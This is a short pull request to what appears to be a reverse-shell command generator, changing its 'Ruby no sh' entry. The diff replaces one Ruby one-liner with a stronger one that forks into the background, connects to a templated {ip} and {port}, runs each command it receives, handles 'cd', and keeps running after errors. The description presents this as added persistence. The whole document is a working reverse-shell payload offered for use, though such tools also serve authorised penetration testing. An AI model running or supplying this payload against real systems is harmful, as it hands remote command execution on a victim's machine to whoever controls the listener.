### PR TITLE
Improve Ruby Reverse Shell

### DIFF
--- a/js/data.js
+++ b/js/data.js
@@ -195,7 +195,7 @@ const reverseShellCommands = withCommandType(
         },
         {
             "name": "Ruby no sh",
-            "command": "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"{ip}\",\"{port}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'",
+            "command": "ruby -rsocket -e'exit if fork;c=TCPSocket.new(\"{ip}\",\"{port}\");loop{c.gets.chomp!;(exit! if $_==\"exit\");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \"failed: #{$_}\"}'",
             "meta": ["linux", "mac"]
         },
         {


### PR DESCRIPTION
Now the reverse shell supports the "cd" command and maintains persistence when an error is raised.